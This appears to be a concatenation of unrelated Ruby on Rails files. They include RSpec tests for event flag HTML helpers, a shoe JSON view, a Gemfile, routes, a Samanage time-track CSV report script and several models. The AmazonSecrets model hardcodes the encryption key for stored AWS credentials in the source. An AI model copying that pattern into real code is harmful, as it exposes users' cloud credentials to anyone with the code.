"<i class='fas gray fa-file-invoice-dollar fa-1x' style='' data-fa-transform='' " \
"title='Registration has already been paid'></i>"
)
end
end
describe 'event_flags' do
let(:committee_1) { create(:committee) }
let(:committee_2) { create(:committee, name: 'Vessel Safety Check') }
before { @current_user_permitted_event_type = true }
it 'does not raise any exceptions' do
expect { event_flags(event) }.not_to raise_error
end
it 'generates the correct catalog flag' do
event.show_in_catalog = true
expect(event_catalog_flag(event)).to eq(
'<div class="birmingham-blue" title="This event is shown in the catalog.">' \
"<i class='fad fa-fw fa-stars fa-1x' style='' data-fa-transform='' title=''></i>" \
'<small>Catalog</small></div>'
)
end
it 'generates the correct activity flag' do
event.activity_feed = true
expect(event_activity_flag(event)).to eq(
'<div class="birmingham-blue" title="This event is available for display in the activity feed.">' \
"<i class='fad fa-fw fa-stream fa-1x' style='' data-fa-transform='' title=''></i>" \
'<small>Activity Feed</small></div>'
)
end
it 'generates the correct invisible flag' do
event.visible = false
expect(event_not_visible_flag(event)).to eq(
'<div class="red" title="This event is not visible to members or the public. Only editors can see it.">' \
"<i class='fad fa-fw fa-eye-slash fa-1x' style='' data-fa-transform='' title=''></i>" \
'<small>Not Visible</small></div>'
)
end
it 'generates the correct quiet flag' do
event.quiet = true
expect(event_quiet_flag(event)).to eq(
'<div class="purple" title="This event is not displayed in the schedule. Direct links can still access it.">' \
"<i class='fad fa-fw fa-face-shush fa-1x' style='' data-fa-transform='' title=''></i>" \
'<small>Quiet</small></div>'
)
end
it 'generates the correct committees flag with one committee' do
event.event_type.assign(committee_1)
expect(event_committees_flag(event)).to eq(
'<div class="green" title="Will notify the listed committee in addition to the relevant bridge officers.">' \
"<i class='fad fa-fw fa-envelope fa-1x' style='' data-fa-transform='' title=''></i>" \
"<small>#{committee_1.name}</small></div>"
)
end
it 'generates the correct committees flag with multiple committees' do
event.event_type.assign(committee_1.name) # Directly pass in string name
event.event_type.assign(committee_2) # Pass in actual Committee object
expect(event_committees_flag(event)).to eq(
'<div class="green" title="Will notify the listed committee in addition to the relevant bridge officers.">' \
"<i class='fad fa-fw fa-envelope fa-1x' style='' data-fa-transform='' title=''></i>" \
"<small>#{committee_1.name}</small></div>" \
'<div class="green" title="Will notify the listed committee in addition to the relevant bridge officers.">' \
"<i class='fad fa-fw fa-envelope fa-1x' style='' data-fa-transform='' title=''></i>" \
"<small>#{committee_2.name}</small></div>"
)
end
it 'generates the correct committees flag with duplicate committees' do
committee_1.name = 'something'
committee_2.name = 'something'
event.event_type.assign(committee_1)
event.event_type.assign(committee_2)
expect(event_committees_flag(event)).to eq(
'<div class="green" title="Will notify the listed committee in addition to the relevant bridge officers.">' \
"<i class='fad fa-fw fa-envelope fa-1x' style='' data-fa-transform='' title=''></i>" \
"<small>#{committee_1.name}</small></div>"
)
end
end
describe '#event_selections_indented' do
it 'generates the correct indented string' do
selection = event.event_selections.create(description: 'An Option')
selection.event_options.create([{ name: 'One' }, { name: 'Two' }])
expect(event_selections_indented(event)).to eq("An Option\n One\n Two")
end
end
end
|
# json.shoes do
# @shoes.each do |shoe|
# json.set! :id do
# json.extract! :id, :name
# if shoe.photo.attached?
# json.photoUrl url_for(shoe.photo)
# end
# end
# end
# end
json.array! @shoes do |shoe|
json.extract! shoe, :id, :name, :price, :brand, :style_code, :colorway, :release_date
json.photoUrl url_for(shoe.photo)
end |
module Noodle
class MinimumNumberOfNodeProperties < ActiveModel::Validator
def validate(record)
record.errors.add(:empty_value, 'Node must have at least one property', strict: true) if record.node_properties.length < 1
end
end
end
|
source 'https://rubygems.org'
# Sinatra is a very simple webserver written in Ruby.
# Documentation is here: http://www.sinatrarb.com/intro.html
gem 'sinatra', '~> 1.4.5'
# Rerun causes Sinatra to auto-reload files that you change so that you do not have to restart the server after every
# change.
gem 'rerun', '~> 0.10.0'
# HAML is a simplified method of writing HTML
# Documentation is here: http://haml.info/
gem 'haml' |
# Fields:
# user_id: ScalarmUser id who has this secrets
# access_key - actually stored as hashed_access_key
# secret_key - actually stored as hashed_secret_key
class AmazonSecrets < MongoActiveRecord
Encryptor.default_options.merge!(:key => Digest::SHA256.hexdigest('QjqjFK}7|Xw8DDMUP-O$yp'))
def self.collection_name
'amazon_secrets'
end
def access_key
Base64.decode64(self.hashed_access_key).decrypt
end
def access_key=(new_access_key)
self.hashed_access_key = Base64.encode64(new_access_key.encrypt)
end
def secret_key
Base64.decode64(self.hashed_secret_key).decrypt
end
def secret_key=(new_secret_key)
self.hashed_secret_key = Base64.encode64(new_secret_key.encrypt)
end
end |
#this is the naive implementation of the pattern matching and, as the name implies, works at quadratic time
class QuadraticPatternsMatcher
attr_accessor :patterns
def initialize(patterns)
@patterns = patterns
end
def best_match(path)
quadratitic_match_candidates.find {|candidate| candidate.matches?(path)}
end
def quadratitic_match_candidates
#we use the compare_for_best_match method so that the first match we find is the best one
@quadratitic_match_candidates ||= patterns.sort {|a,b| a.compare_for_best_match(b)}
end
end |
Rails.application.routes.draw do
mount RailsAdmin::Engine => '/myapp_admin', as: 'rails_admin'
devise_for :users, path: '', path_names: { sign_in: 'myapp_login', sign_out: 'myapp_logout' },
only: [:sessions]
apipie
namespace :api, defaults: {format: 'json'} do
namespace :v1 do
devise_scope :user do
post '/auth/sign_in', to: 'sessions#create'
delete '/auth/sign_out', to: 'sessions#destroy'
post '/auth/passwords', to: 'passwords#create'
put '/auth/passwords', to: 'passwords#update'
post '/auth', to: 'registrations#create'
put '/auth', to: 'registrations#update'
delete '/auth', to: 'registrations#destroy'
end
end
end
end
|
class WorkerType < ApplicationRecord
belongs_to :guard
belongs_to :worker
end
|
require 'rails_helper'
RSpec.describe "V1 Users API", :type => :request do
let!(:users) { create_list(:user, 3) }
let(:json) { JSON.parse(response.body) }
context "when request the information for users" do
it "returns a collection of all users that exists" do
get api_v1_users_path
expect(response.status).to eq 200
expect(json['data'].length).to eq 3
end
end
end
|
require 'rails_helper'
RSpec.describe "users/edit", :type => :view do
before(:each) do
@user = assign(:user, User.create!(
:name => "MyString",
:email => "MyString",
:password => "MyString",
:age => 1,
:gender => 1,
:prefecture => "",
:home_prefecture => nil,
:job => "MyString",
:married => "",
:introduction => "MyString",
:winelevel => 1.5,
:winenum => 1,
:follow => 1,
:follower => 1,
:ranking => 1
))
end
it "renders the edit user form" do
render
assert_select "form[action=?][method=?]", user_path(@user), "post" do
assert_select "input#user_name[name=?]", "user[name]"
assert_select "input#user_email[name=?]", "user[email]"
assert_select "input#user_password[name=?]", "user[password]"
assert_select "input#user_age[name=?]", "user[age]"
assert_select "input#user_gender[name=?]", "user[gender]"
assert_select "input#user_prefecture[name=?]", "user[prefecture]"
assert_select "input#user_home_prefecture_id[name=?]", "user[home_prefecture_id]"
assert_select "input#user_job[name=?]", "user[job]"
assert_select "input#user_married[name=?]", "user[married]"
assert_select "input#user_introduction[name=?]", "user[introduction]"
assert_select "input#user_winelevel[name=?]", "user[winelevel]"
assert_select "input#user_winenum[name=?]", "user[winenum]"
assert_select "input#user_follow[name=?]", "user[follow]"
assert_select "input#user_follower[name=?]", "user[follower]"
assert_select "input#user_ranking[name=?]", "user[ranking]"
end
end
end
|
require 'samanage'
require 'csv'
api_token = ARGV[0]
input = ARGV[1]
datacenter = ARGV[2]
@samanage = Samanage::Api.new(token: api_token, datacenter: datacenter)
REPORT_FILENAME = "Report - Time Tracks - #{DateTime.now.strftime("%b-%m-%Y %H%M")}.csv"
def log_to_csv(row: , filename: REPORT_FILENAME, headers: [])
write_headers = !File.exists?(filename)
CSV.open(filename, 'a+', write_headers: write_headers, force_quotes: true) do |csv|
csv << headers if csv.count.eql? 0
csv << row
end
end
def convert_time(minutes)
h = minutes / 60
m = (minutes % 60).to_s.rjust(2, "0")
"#{h}:#{m}"
end
@samanage.incidents(options: {verbose: true, 'updated[]': 30}).each do |incident|
unless incident['time_tracks'].to_a.empty?
@samanage.time_tracks(incident_id: incident['id']).each do |time_track|
# if some_custom_validation
# next
# end
time_entered = convert_time(time_track['minutes'].to_i)
row = {
'Time Track Entered By' => time_track.dig('creator','email'),
'Time Entered (h:m)' => time_entered,
'Time Entered At' => time_track['created_at'],
'Incident URL' => "https://app#{datacenter}.samanage.com/incidents/#{incident['id']}",
'Incident Number' => incident['number'],
'Incident State' => incident.dig('state'),
'Incident Created At' => incident['created_at'],
'Incident Updated At' => incident['updated_at'],
'Incident Category' => incident.dig('category','name'),
'Incident Subcategory' => incident.dig('subcategory','name'),
'Incident Site' => incident.dig('site','name'),
'Incident Department' => incident.dig('department','name'),
'Incident Assignee Email' => incident.dig('assignee','email'),
'Incident Assignee Name' => incident.dig('assignee','name'),
'Incident Requester Email' => incident.dig('requester','email'),
'Incident Requester Name' => incident.dig('requester','name'),
# Add / remove columns here from time track or parent incident data.
}
log_to_csv(row: row.values, headers: row.keys)
end
end
end |
class Study < ApplicationRecord
validates :name, presence:true
validates :drug, presence:true
validates_numericality_of :age_limit, greater_than:7
validates_numericality_of :phase, less_than:6
belongs_to :study_group
has_many :sites
has_many :enrollments
has_many :subjects, through: :enrollments
has_one :side_effect
has_one_attached :my_image
after_save :success_study
scope :usable_drugs, -> { where('phase>=4')}
scope :under_trials, -> { where('phase<4')}
def success_study
StudyMailer.delay.success_email(self)
end
handle_asynchronously :success_study, priority:0
end
|
class Assignment < ActiveRecord::Base
belongs_to :user
belongs_to :role
scope :registered, where(:role_id => 1)
end
|
class ProviderPhone < ApplicationRecord
belongs_to :phone
belongs_to :provider
end
|
class CategoryInventory
attr_reader :database
def initialize(database)
@database = database
end
def dataset
database.from(:categories)
end
def create(category)
dataset.insert(category)
end
def all
dataset.map { |category| Category.new(category)}
end
end
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.